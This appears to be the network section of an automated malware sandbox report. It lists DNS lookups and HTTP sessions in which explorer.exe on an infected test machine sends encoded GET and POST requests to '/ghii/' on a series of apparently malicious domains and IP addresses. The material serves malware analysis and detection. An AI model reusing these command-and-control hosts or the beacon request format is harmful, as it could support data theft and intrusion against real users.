                                                                                            Feb 18, 2023 13:08:21.949378967 CET804972723.227.38.74192.168.2.3
                                                                                            Feb 18, 2023 13:08:21.949445963 CET804972723.227.38.74192.168.2.3
                                                                                            Feb 18, 2023 13:08:21.949508905 CET804972723.227.38.74192.168.2.3
                                                                                            Feb 18, 2023 13:08:21.949564934 CET804972723.227.38.74192.168.2.3
                                                                                            Feb 18, 2023 13:08:21.949620962 CET804972723.227.38.74192.168.2.3
                                                                                            Feb 18, 2023 13:08:21.949628115 CET4972780192.168.2.323.227.38.74
                                                                                            Feb 18, 2023 13:08:21.949711084 CET4972780192.168.2.323.227.38.74
                                                                                            Feb 18, 2023 13:08:21.949754000 CET4972780192.168.2.323.227.38.74
                                                                                            Feb 18, 2023 13:08:21.956162930 CET4972780192.168.2.323.227.38.74
                                                                                            Feb 18, 2023 13:08:21.973191977 CET804972723.227.38.74192.168.2.3
                                                                                            Feb 18, 2023 13:08:27.041810989 CET4972880192.168.2.385.159.66.93
                                                                                            Feb 18, 2023 13:08:27.092767954 CET804972885.159.66.93192.168.2.3
                                                                                            Feb 18, 2023 13:08:27.092968941 CET4972880192.168.2.385.159.66.93
                                                                                            Feb 18, 2023 13:08:27.093106985 CET4972880192.168.2.385.159.66.93
                                                                                            Feb 18, 2023 13:08:27.144064903 CET804972885.159.66.93192.168.2.3
                                                                                            Feb 18, 2023 13:08:27.207192898 CET804972885.159.66.93192.168.2.3
                                                                                            Feb 18, 2023 13:08:27.207473040 CET4972880192.168.2.385.159.66.93
                                                                                            Feb 18, 2023 13:08:28.602936983 CET4972880192.168.2.385.159.66.93
                                                                                            Feb 18, 2023 13:08:29.618988037 CET4972980192.168.2.385.159.66.93
                                                                                            Feb 18, 2023 13:08:29.667851925 CET804972985.159.66.93192.168.2.3
                                                                                            Feb 18, 2023 13:08:29.671500921 CET4972980192.168.2.385.159.66.93
                                                                                            Feb 18, 2023 13:08:29.676469088 CET4972980192.168.2.385.159.66.93
                                                                                            Feb 18, 2023 13:08:29.725455046 CET804972985.159.66.93192.168.2.3
                                                                                            Feb 18, 2023 13:08:29.870501041 CET804972985.159.66.93192.168.2.3
                                                                                            Feb 18, 2023 13:08:29.872987032 CET804972985.159.66.93192.168.2.3
                                                                                            Feb 18, 2023 13:08:29.873105049 CET4972980192.168.2.385.159.66.93
                                                                                            Feb 18, 2023 13:08:31.181278944 CET4972980192.168.2.385.159.66.93
                                                                                            Feb 18, 2023 13:08:32.198807001 CET4973080192.168.2.385.159.66.93
                                                                                            Feb 18, 2023 13:08:32.247759104 CET804973085.159.66.93192.168.2.3
                                                                                            Feb 18, 2023 13:08:32.247905970 CET4973080192.168.2.385.159.66.93
                                                                                            Feb 18, 2023 13:08:32.248002052 CET4973080192.168.2.385.159.66.93
                                                                                            Feb 18, 2023 13:08:32.525103092 CET4973080192.168.2.385.159.66.93
                                                                                            Feb 18, 2023 13:08:32.837626934 CET4973080192.168.2.385.159.66.93
                                                                                            Feb 18, 2023 13:08:33.447046995 CET4973080192.168.2.385.159.66.93
                                                                                            Feb 18, 2023 13:08:34.650283098 CET4973080192.168.2.385.159.66.93
                                                                                            Feb 18, 2023 13:08:35.853471041 CET4973080192.168.2.385.159.66.93
                                                                                            Feb 18, 2023 13:08:37.056720018 CET4973080192.168.2.385.159.66.93
                                                                                            Feb 18, 2023 13:08:39.463313103 CET4973080192.168.2.385.159.66.93
                                                                                            Feb 18, 2023 13:08:44.276216984 CET4973080192.168.2.385.159.66.93
                                                                                            Feb 18, 2023 13:08:53.886291981 CET4973080192.168.2.385.159.66.93

                                                                                            UDP Packets

                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                            Feb 18, 2023 13:05:18.631140947 CET6270453192.168.2.38.8.8.8
                                                                                            Feb 18, 2023 13:05:18.946214914 CET53627048.8.8.8192.168.2.3
                                                                                            Feb 18, 2023 13:05:30.097428083 CET4997753192.168.2.38.8.8.8
                                                                                            Feb 18, 2023 13:05:30.202426910 CET53499778.8.8.8192.168.2.3
                                                                                            Feb 18, 2023 13:05:52.316936016 CET5799053192.168.2.38.8.8.8
                                                                                            Feb 18, 2023 13:05:52.398124933 CET53579908.8.8.8192.168.2.3
                                                                                            Feb 18, 2023 13:06:14.482163906 CET5238753192.168.2.38.8.8.8
                                                                                            Feb 18, 2023 13:06:14.501961946 CET53523878.8.8.8192.168.2.3
                                                                                            Feb 18, 2023 13:06:36.153141022 CET5692453192.168.2.38.8.8.8
                                                                                            Feb 18, 2023 13:06:36.214807034 CET53569248.8.8.8192.168.2.3
                                                                                            Feb 18, 2023 13:06:43.712565899 CET6062553192.168.2.38.8.8.8
                                                                                            Feb 18, 2023 13:06:43.735089064 CET53606258.8.8.8192.168.2.3
                                                                                            Feb 18, 2023 13:06:54.620430946 CET4930253192.168.2.38.8.8.8
                                                                                            Feb 18, 2023 13:06:54.733124018 CET53493028.8.8.8192.168.2.3
                                                                                            Feb 18, 2023 13:07:05.261639118 CET5397553192.168.2.38.8.8.8
                                                                                            Feb 18, 2023 13:07:05.286906004 CET53539758.8.8.8192.168.2.3
                                                                                            Feb 18, 2023 13:07:16.317331076 CET5113953192.168.2.38.8.8.8
                                                                                            Feb 18, 2023 13:07:16.476039886 CET53511398.8.8.8192.168.2.3
                                                                                            Feb 18, 2023 13:07:27.120227098 CET5295553192.168.2.38.8.8.8
                                                                                            Feb 18, 2023 13:07:27.228274107 CET53529558.8.8.8192.168.2.3
                                                                                            Feb 18, 2023 13:07:37.710606098 CET6058253192.168.2.38.8.8.8
                                                                                            Feb 18, 2023 13:07:37.833245039 CET53605828.8.8.8192.168.2.3
                                                                                            Feb 18, 2023 13:07:48.405054092 CET5713453192.168.2.38.8.8.8
                                                                                            Feb 18, 2023 13:07:48.442615032 CET53571348.8.8.8192.168.2.3
                                                                                            Feb 18, 2023 13:07:58.922179937 CET6205053192.168.2.38.8.8.8
                                                                                            Feb 18, 2023 13:07:58.943738937 CET53620508.8.8.8192.168.2.3
                                                                                            Feb 18, 2023 13:07:59.962656021 CET5604253192.168.2.38.8.8.8
                                                                                            Feb 18, 2023 13:07:59.984265089 CET53560428.8.8.8192.168.2.3
                                                                                            Feb 18, 2023 13:08:00.994874001 CET5963653192.168.2.38.8.8.8
                                                                                            Feb 18, 2023 13:08:01.016422987 CET53596368.8.8.8192.168.2.3
                                                                                            Feb 18, 2023 13:08:06.342221022 CET5563853192.168.2.38.8.8.8
                                                                                            Feb 18, 2023 13:08:06.384716988 CET53556388.8.8.8192.168.2.3
                                                                                            Feb 18, 2023 13:08:16.607943058 CET5770453192.168.2.38.8.8.8
                                                                                            Feb 18, 2023 13:08:16.795341015 CET53577048.8.8.8192.168.2.3
                                                                                            Feb 18, 2023 13:08:26.973630905 CET6532053192.168.2.38.8.8.8
                                                                                            Feb 18, 2023 13:08:27.040874958 CET53653208.8.8.8192.168.2.3

                                                                                            DNS Queries

                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                            Feb 18, 2023 13:05:18.631140947 CET192.168.2.38.8.8.80xe0eStandard query (0)www.wenzid4.topA (IP address)IN (0x0001)false
                                                                                            Feb 18, 2023 13:05:30.097428083 CET192.168.2.38.8.8.80x65efStandard query (0)www.cutgang.netA (IP address)IN (0x0001)false
                                                                                            Feb 18, 2023 13:05:52.316936016 CET192.168.2.38.8.8.80x24dfStandard query (0)www.cutgang.netA (IP address)IN (0x0001)false
                                                                                            Feb 18, 2023 13:06:14.482163906 CET192.168.2.38.8.8.80x672aStandard query (0)www.cutgang.netA (IP address)IN (0x0001)false
                                                                                            Feb 18, 2023 13:06:36.153141022 CET192.168.2.38.8.8.80x6420Standard query (0)www.cutgang.netA (IP address)IN (0x0001)false
                                                                                            Feb 18, 2023 13:06:43.712565899 CET192.168.2.38.8.8.80xb840Standard query (0)www.energybig.xyzA (IP address)IN (0x0001)false
                                                                                            Feb 18, 2023 13:06:54.620430946 CET192.168.2.38.8.8.80x2f63Standard query (0)www.genuineinsights.cloudA (IP address)IN (0x0001)false
                                                                                            Feb 18, 2023 13:07:05.261639118 CET192.168.2.38.8.8.80x908cStandard query (0)www.octohoki.netA (IP address)IN (0x0001)false
                                                                                            Feb 18, 2023 13:07:16.317331076 CET192.168.2.38.8.8.80x1960Standard query (0)www.ladybillplanet.comA (IP address)IN (0x0001)false
                                                                                            Feb 18, 2023 13:07:27.120227098 CET192.168.2.38.8.8.80xc88Standard query (0)www.hubyazilim.comA (IP address)IN (0x0001)false
                                                                                            Feb 18, 2023 13:07:37.710606098 CET192.168.2.38.8.8.80x3f21Standard query (0)www.7dkjhk.comA (IP address)IN (0x0001)false
                                                                                            Feb 18, 2023 13:07:48.405054092 CET192.168.2.38.8.8.80xa7b1Standard query (0)www.assilajamiart.comA (IP address)IN (0x0001)false
                                                                                            Feb 18, 2023 13:07:58.922179937 CET192.168.2.38.8.8.80xa17aStandard query (0)www.bemmulher.onlineA (IP address)IN (0x0001)false
                                                                                            Feb 18, 2023 13:07:59.962656021 CET192.168.2.38.8.8.80xeb68Standard query (0)www.bemmulher.onlineA (IP address)IN (0x0001)false
                                                                                            Feb 18, 2023 13:08:00.994874001 CET192.168.2.38.8.8.80xe9f9Standard query (0)www.bemmulher.onlineA (IP address)IN (0x0001)false
                                                                                            Feb 18, 2023 13:08:06.342221022 CET192.168.2.38.8.8.80x30eStandard query (0)www.sem-jobs.comA (IP address)IN (0x0001)false
                                                                                            Feb 18, 2023 13:08:16.607943058 CET192.168.2.38.8.8.80xcc1eStandard query (0)www.yeah-go.comA (IP address)IN (0x0001)false
                                                                                            Feb 18, 2023 13:08:26.973630905 CET192.168.2.38.8.8.80xd645Standard query (0)www.ixirwholesale.xyzA (IP address)IN (0x0001)false

                                                                                            DNS Answers

                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                            Feb 18, 2023 13:05:18.946214914 CET8.8.8.8192.168.2.30xe0eNo error (0)www.wenzid4.top107.148.8.96A (IP address)IN (0x0001)false
                                                                                            Feb 18, 2023 13:05:30.202426910 CET8.8.8.8192.168.2.30x65efNo error (0)www.cutgang.netcutgang.netCNAME (Canonical name)IN (0x0001)false
                                                                                            Feb 18, 2023 13:05:30.202426910 CET8.8.8.8192.168.2.30x65efNo error (0)cutgang.net194.102.227.30A (IP address)IN (0x0001)false
                                                                                            Feb 18, 2023 13:05:52.398124933 CET8.8.8.8192.168.2.30x24dfNo error (0)www.cutgang.netcutgang.netCNAME (Canonical name)IN (0x0001)false
                                                                                            Feb 18, 2023 13:05:52.398124933 CET8.8.8.8192.168.2.30x24dfNo error (0)cutgang.net194.102.227.30A (IP address)IN (0x0001)false
                                                                                            Feb 18, 2023 13:06:14.501961946 CET8.8.8.8192.168.2.30x672aNo error (0)www.cutgang.netcutgang.netCNAME (Canonical name)IN (0x0001)false
                                                                                            Feb 18, 2023 13:06:14.501961946 CET8.8.8.8192.168.2.30x672aNo error (0)cutgang.net194.102.227.30A (IP address)IN (0x0001)false
                                                                                            Feb 18, 2023 13:06:36.214807034 CET8.8.8.8192.168.2.30x6420No error (0)www.cutgang.netcutgang.netCNAME (Canonical name)IN (0x0001)false
                                                                                            Feb 18, 2023 13:06:36.214807034 CET8.8.8.8192.168.2.30x6420No error (0)cutgang.net194.102.227.30A (IP address)IN (0x0001)false
                                                                                            Feb 18, 2023 13:06:43.735089064 CET8.8.8.8192.168.2.30xb840No error (0)www.energybig.xyz184.94.215.91A (IP address)IN (0x0001)false
                                                                                            Feb 18, 2023 13:06:54.733124018 CET8.8.8.8192.168.2.30x2f63No error (0)www.genuineinsights.cloud66.96.162.149A (IP address)IN (0x0001)false
                                                                                            Feb 18, 2023 13:07:05.286906004 CET8.8.8.8192.168.2.30x908cNo error (0)www.octohoki.netparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)false
                                                                                            Feb 18, 2023 13:07:05.286906004 CET8.8.8.8192.168.2.30x908cNo error (0)parkingpage.namecheap.com198.54.117.216A (IP address)IN (0x0001)false
                                                                                            Feb 18, 2023 13:07:05.286906004 CET8.8.8.8192.168.2.30x908cNo error (0)parkingpage.namecheap.com198.54.117.211A (IP address)IN (0x0001)false
                                                                                            Feb 18, 2023 13:07:05.286906004 CET8.8.8.8192.168.2.30x908cNo error (0)parkingpage.namecheap.com198.54.117.215A (IP address)IN (0x0001)false
                                                                                            Feb 18, 2023 13:07:05.286906004 CET8.8.8.8192.168.2.30x908cNo error (0)parkingpage.namecheap.com198.54.117.217A (IP address)IN (0x0001)false
                                                                                            Feb 18, 2023 13:07:05.286906004 CET8.8.8.8192.168.2.30x908cNo error (0)parkingpage.namecheap.com198.54.117.210A (IP address)IN (0x0001)false
                                                                                            Feb 18, 2023 13:07:05.286906004 CET8.8.8.8192.168.2.30x908cNo error (0)parkingpage.namecheap.com198.54.117.212A (IP address)IN (0x0001)false
                                                                                            Feb 18, 2023 13:07:05.286906004 CET8.8.8.8192.168.2.30x908cNo error (0)parkingpage.namecheap.com198.54.117.218A (IP address)IN (0x0001)false
                                                                                            Feb 18, 2023 13:07:16.476039886 CET8.8.8.8192.168.2.30x1960No error (0)www.ladybillplanet.comladybillplanet.comCNAME (Canonical name)IN (0x0001)false
                                                                                            Feb 18, 2023 13:07:16.476039886 CET8.8.8.8192.168.2.30x1960No error (0)ladybillplanet.com66.235.200.146A (IP address)IN (0x0001)false
                                                                                            Feb 18, 2023 13:07:27.228274107 CET8.8.8.8192.168.2.30xc88No error (0)www.hubyazilim.com91.195.240.117A (IP address)IN (0x0001)false
                                                                                            Feb 18, 2023 13:07:37.833245039 CET8.8.8.8192.168.2.30x3f21No error (0)www.7dkjhk.com208.100.26.245A (IP address)IN (0x0001)false
                                                                                            Feb 18, 2023 13:07:48.442615032 CET8.8.8.8192.168.2.30xa7b1No error (0)www.assilajamiart.comassilajamiart.comCNAME (Canonical name)IN (0x0001)false
                                                                                            Feb 18, 2023 13:07:48.442615032 CET8.8.8.8192.168.2.30xa7b1No error (0)assilajamiart.com141.95.126.89A (IP address)IN (0x0001)false
                                                                                            Feb 18, 2023 13:07:58.943738937 CET8.8.8.8192.168.2.30xa17aName error (3)www.bemmulher.onlinenonenoneA (IP address)IN (0x0001)false
                                                                                            Feb 18, 2023 13:07:59.984265089 CET8.8.8.8192.168.2.30xeb68Name error (3)www.bemmulher.onlinenonenoneA (IP address)IN (0x0001)false
                                                                                            Feb 18, 2023 13:08:01.016422987 CET8.8.8.8192.168.2.30xe9f9Name error (3)www.bemmulher.onlinenonenoneA (IP address)IN (0x0001)false
                                                                                            Feb 18, 2023 13:08:06.384716988 CET8.8.8.8192.168.2.30x30eNo error (0)www.sem-jobs.com85.13.156.177A (IP address)IN (0x0001)false
                                                                                            Feb 18, 2023 13:08:16.795341015 CET8.8.8.8192.168.2.30xcc1eNo error (0)www.yeah-go.comshops.myshopify.comCNAME (Canonical name)IN (0x0001)false
                                                                                            Feb 18, 2023 13:08:16.795341015 CET8.8.8.8192.168.2.30xcc1eNo error (0)shops.myshopify.com23.227.38.74A (IP address)IN (0x0001)false
                                                                                            Feb 18, 2023 13:08:27.040874958 CET8.8.8.8192.168.2.30xd645No error (0)www.ixirwholesale.xyzredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                            Feb 18, 2023 13:08:27.040874958 CET8.8.8.8192.168.2.30xd645No error (0)redirect.natrocdn.comnatroredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                                                                            Feb 18, 2023 13:08:27.040874958 CET8.8.8.8192.168.2.30xd645No error (0)natroredirect.natrocdn.com85.159.66.93A (IP address)IN (0x0001)false

                                                                                            HTTP Request Dependency Graph

                                                                                            • www.wenzid4.top
                                                                                            • www.energybig.xyz
                                                                                            • www.genuineinsights.cloud
                                                                                            • www.octohoki.net
                                                                                            • www.ladybillplanet.com
                                                                                            • www.hubyazilim.com
                                                                                            • www.7dkjhk.com
                                                                                            • www.assilajamiart.com
                                                                                            • www.sem-jobs.com
                                                                                            • www.yeah-go.com
                                                                                            • www.ixirwholesale.xyz

                                                                                            HTTP Packets

                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                            0192.168.2.349697107.148.8.9680C:\Windows\explorer.exe
                                                                                            TimestampkBytes transferredDirectionData
                                                                                            Feb 18, 2023 13:05:19.865942001 CET103OUTGET /ghii/?9WI6t=QaRcz&Y5=MOY5/0rZkCSn1x8B5kGxcu4kjN12BC26NMBU4rUAiJ09dU/WDm+Fx0Du9tK3DtQGeLOXEwxSHBLi0tUrRAF6AjHy/cvLKIMIEQ== HTTP/1.1
                                                                                            Host: www.wenzid4.top
                                                                                            Connection: close
                                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                                            Data Ascii:
                                                                                            Feb 18, 2023 13:05:20.073117971 CET104INHTTP/1.1 404 Not Found
                                                                                            Server: nginx
                                                                                            Date: Sat, 18 Feb 2023 12:03:32 GMT
                                                                                            Content-Type: text/html
                                                                                            Content-Length: 146
                                                                                            Connection: close
                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                            Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                            1192.168.2.349701184.94.215.9180C:\Windows\explorer.exe
                                                                                            TimestampkBytes transferredDirectionData
                                                                                            Feb 18, 2023 13:06:43.914007902 CET118OUTPOST /ghii/ HTTP/1.1
                                                                                            Host: www.energybig.xyz
                                                                                            Connection: close
                                                                                            Content-Length: 184
                                                                                            Cache-Control: no-cache
                                                                                            Origin: http://www.energybig.xyz
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Accept: */*
                                                                                            Referer: http://www.energybig.xyz/ghii/
                                                                                            Accept-Language: en-US
                                                                                            Accept-Encoding: gzip, deflate
                                                                                            Data Raw: 59 35 3d 4b 75 47 55 64 7a 32 39 51 61 76 34 54 6a 52 59 70 51 55 4d 57 62 6d 6d 78 61 4d 6b 79 5f 39 55 4e 6c 47 4b 61 56 4c 4b 45 49 63 36 6f 61 33 38 41 59 4f 7a 63 75 63 4f 67 76 50 7a 63 6a 32 59 63 59 75 70 38 5f 51 4d 71 55 61 38 69 69 71 32 38 63 37 5a 75 59 45 6c 68 79 38 6f 30 4f 39 71 50 67 4b 52 43 6c 57 50 30 65 39 31 6f 2d 6a 4c 48 4f 6c 4d 6d 79 41 46 70 56 46 6b 35 37 6b 5f 63 56 30 79 57 41 48 53 4d 39 63 35 69 59 46 42 54 43 61 63 43 4a 41 71 76 56 47 2d 57 30 44 34 78 6a 52 53 45 62 65 4d 65 65 5a 4f 44 76 36 55 55 41 29 2e 00 00 00 00 00 00 00 00
                                                                                            Data Ascii: Y5=KuGUdz29Qav4TjRYpQUMWbmmxaMky_9UNlGKaVLKEIc6oa38AYOzcucOgvPzcj2YcYup8_QMqUa8iiq28c7ZuYElhy8o0O9qPgKRClWP0e91o-jLHOlMmyAFpVFk57k_cV0yWAHSM9c5iYFBTCacCJAqvVG-W0D4xjRSEbeMeeZODv6UUA).
                                                                                            Feb 18, 2023 13:06:44.177194118 CET119INHTTP/1.1 404 Not Found
                                                                                            Date: Sat, 18 Feb 2023 12:06:43 GMT
                                                                                            Server: Apache
                                                                                            Content-Length: 5278
                                                                                            Connection: close
                                                                                            Content-Type: text/html
                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4d 6f 6e 74 73 65 72 72 61 74 3a 32 30 30 2c 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 34 30 34 2e 63 73 73 22 20 2f 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 3e 3c 2f 64 69 76 3e 0a 3c 73 76 67 20 69 64 3d 22 73 76 67 57 72 61 70 5f 32 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 3d 22 30 70 78 22 20 79 3d 22 30 70 78 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 37 30 30 20 32 35 30 22 3e 0a 20 20 3c 67 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 33 5f 32 22 20 64 3d 22 4d 31 39 35 2e 37 20 32 33 32 2e 36 37 68 2d 33 37 2e 31 56 31 34 39 2e 37 48 32 37 2e 37 36 63 2d 32 2e 36 34 20 30 2d 35 2e 31 2d 2e 35 2d 37 2e 33 36 2d 31 2e 34 39 2d 32 2e 32 37 2d 2e 39 39 2d 34 2e 32 33 2d 32 2e 33 31 2d 35 2e 38 38 2d 33 2e 39 36 2d 31 2e 36 35 2d 31 2e 36 35 2d 32 2e 39 35 2d 33 2e 36 31 2d 33 2e 38 39 2d 35 2e 38 38 73 2d 31 2e 34 32 2d 34 2e 36 37 2d 31 2e 34 32 2d 37 2e 32 32 56 32 39 2e 36 32 68 33 36 2e 38 32 76 38 32 2e 39 38 48 31 35 38 2e 36 56 32 39 2e 36 32 68 33 37 2e 31 76 32 30 33 2e 30 35 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 32 5f 32 22 20 64 3d 22 4d 34 37 30 2e 36 39 20 31 34 37 2e 37 31 63 30 20 38 2e 33 31 2d 31 2e 30 36 20 31 36 2e 31 37 2d 33 2e 31 39 20 32 33 2e 35 38 2d 32 2e 31 32 20 37 2e 34 31 2d 35 2e 31 32 20 31 34 2e 32 38 2d 38 2e 39 39 20 32 30 2e 36 2d 33 2e 38 37 20 36 2e 33 33 2d 38 2e 34 35 20 31 31 2e 39 39 2d 31 33 2e 37 34 20 31 36 2e 39 39 2d 35 2e 32 39 20 35 2d 31 31 2e 30 37 20 39 2e 32 38 2d 31 37 2e 33 35 20 31 32 2e 38 31 61 38 35 2e 31 34 36 20 38 35 2e 31 34 36 20 30 20 30 20 31 2d 32 30 2e 30 34 20 38 2e 31 34 20 38 33 2e 36 33 37 20 38 33 2e 36 33 37 20 30 20 30 20 31 2d 32 31 2e 36 37 20 32 2e 38 33 48 33 31 39 2e 33 63 2d 37 2e 34 36 20 30 2d 31 34 2e 37 33 2d 2e 39 34 2d 32 31 2e 38 31 2d 32 2e 38 33 2d 37 2e 30 38 2d 31 2e 38 39 2d 31 33 2e 37 36 2d 34 2e 36 2d 32 30 2e 30 34 2d 38 2e 31 34 61 38 38 2e 32 39 32 20 38 38 2e 32 39 32 20 30 20 30 20 31 2d 31 37 2e 33 35 2d 31 32 2e 38 31 63 2d 35 2e 32 39 2d 35 2d 39 2e 38 34 2d 31 30 2e 36 37 2d 31 33 2e 36 36 2d 31 36 2e 39 39 2d 33 2e 38 32 2d 36 2e 33 32 2d 36 2e 38 2d 31 33 2e 31 39 2d 38 2e 39 32 2d 32 30 2e 36 2d 32 2e 31 32 2d 37 2e 34 31 2d 33 2e 31 39 2d 31 35 2e 32 37 2d 33 2e 31 39 2d 32 33 2e 35 38 76 2d 33 33 2e 31 33 63 30 2d
                                                                                            Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Montserrat:200,400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/404.css" /></head><body><div></div><svg id="svgWrap_2" xmlns="http://www.w3.org/2000/svg" x="0px" y="0px" viewBox="0 0 700 250"> <g> <path id="id3_2" d="M195.7 232.67h-37.1V149.7H27.76c-2.64 0-5.1-.5-7.36-1.49-2.27-.99-4.23-2.31-5.88-3.96-1.65-1.65-2.95-3.61-3.89-5.88s-1.42-4.67-1.42-7.22V29.62h36.82v82.98H158.6V29.62h37.1v203.05z"/> <path id="id2_2" d="M470.69 147.71c0 8.31-1.06 16.17-3.19 23.58-2.12 7.41-5.12 14.28-8.99 20.6-3.87 6.33-8.45 11.99-13.74 16.99-5.29 5-11.07 9.28-17.35 12.81a85.146 85.146 0 0 1-20.04 8.14 83.637 83.637 0 0 1-21.67 2.83H319.3c-7.46 0-14.73-.94-21.81-2.83-7.08-1.89-13.76-4.6-20.04-8.14a88.292 88.292 0 0 1-17.35-12.81c-5.29-5-9.84-10.67-13.66-16.99-3.82-6.32-6.8-13.19-8.92-20.6-2.12-7.41-3.19-15.27-3.19-23.58v-33.13c0-
                                                                                            Feb 18, 2023 13:06:44.177252054 CET121INData Raw: 31 32 2e 34 36 20 32 2e 33 34 2d 32 33 2e 38 38 20 37 2e 30 31 2d 33 34 2e 32 37 20 34 2e 36 37 2d 31 30 2e 33 38 20 31 30 2e 39 32 2d 31 39 2e 33 33 20 31 38 2e 37 36 2d 32 36 2e 38 33 20 37 2e 38 33 2d 37 2e 35 20 31 36 2e 38 37 2d 31 33 2e 33
                                                                                            Data Ascii: 12.46 2.34-23.88 7.01-34.27 4.67-10.38 10.92-19.33 18.76-26.83 7.83-7.5 16.87-13.36 27.12-17.56 10.24-4.2 20.93-6.3 32.07-6.3h66.41c7.36 0 14.58.94 21.67 2.83 7.08 1.89 13.76 4.6 20.04 8.14a88.292 88.292 0 0 1 17.35 12.81c5.29 5 9.86 10.67 13.
                                                                                            Feb 18, 2023 13:06:44.177272081 CET122INData Raw: 35 20 33 2e 30 32 20 35 2e 31 37 20 35 2e 30 39 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 69 64 31 5f 32 22 20 64 3d 22 4d 36 38 38 2e 33 33 20 32 33 32 2e 36 37 68 2d 33 37 2e 31 56 31 34 39 2e 37 48 35 32 30 2e 33 39 63 2d 32 2e
                                                                                            Data Ascii: 5 3.02 5.17 5.09z"/> <path id="id1_2" d="M688.33 232.67h-37.1V149.7H520.39c-2.64 0-5.1-.5-7.36-1.49-2.27-.99-4.23-2.31-5.88-3.96-1.65-1.65-2.95-3.61-3.89-5.88s-1.42-4.67-1.42-7.22V29.62h36.82v82.98h112.57V29.62h37.1v203.05z"/> </g></svg
                                                                                            Feb 18, 2023 13:06:44.177292109 CET123INData Raw: 33 2e 35 38 76 33 33 2e 31 34 7a 6d 2d 33 37 2e 31 2d 33 33 2e 31 33 63 30 2d 37 2e 32 37 2d 31 2e 33 32 2d 31 33 2e 38 38 2d 33 2e 39 36 2d 31 39 2e 38 32 2d 32 2e 36 34 2d 35 2e 39 35 2d 36 2e 31 36 2d 31 31 2e 30 34 2d 31 30 2e 35 35 2d 31 35
                                                                                            Data Ascii: 3.58v33.14zm-37.1-33.13c0-7.27-1.32-13.88-3.96-19.82-2.64-5.95-6.16-11.04-10.55-15.29-4.39-4.25-9.46-7.5-15.22-9.77-5.76-2.27-11.8-3.35-18.13-3.26h-66.41c-6.14-.09-12.11.97-17.91 3.19-5.81 2.22-10.95 5.43-15.44 9.63-4.48 4.2-8.07 9.3-10.76 15.
